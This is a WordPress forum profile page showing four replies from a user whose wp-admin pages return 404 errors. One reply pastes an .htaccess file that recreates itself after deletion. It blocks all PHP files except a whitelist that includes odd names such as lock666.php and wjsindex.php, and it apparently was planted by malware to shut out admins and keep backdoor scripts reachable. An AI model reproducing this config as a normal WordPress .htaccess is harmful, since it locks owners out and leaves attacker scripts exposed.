cinebeiy
Forum Replies Created
Viewing 4 replies - 1 through 4 (of 4 total)
-
Forum: Fixing WordPress
In reply to: all wp-admin/* give me 404 errorYes as you see all files exist
i tried to make new WordPress installation in new path also the same problem
Forum: Fixing WordPress
In reply to: all wp-admin/* give me 404 errorUnfortunately The same error persists
Forum: Fixing WordPress
In reply to: all wp-admin/* give me 404 errori already tried it to rename .htaccess
a new .htaccess has been created automatically
this is my .htaccess content :
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule>Forum: Fixing WordPress
In reply to: all wp-admin/* give me 404 errori do exactly what you said but no result the problem persists
In my admin dashboard I can’t access anything
I only see the main page of my dashboard abd any other url gives me 404 error page
in frontend my store looks fin
but any action needs ajax doesn’t work
like add to cart or pop ups …
Can you give any suggestions on how to proceed with problem ?
Viewing 4 replies - 1 through 4 (of 4 total)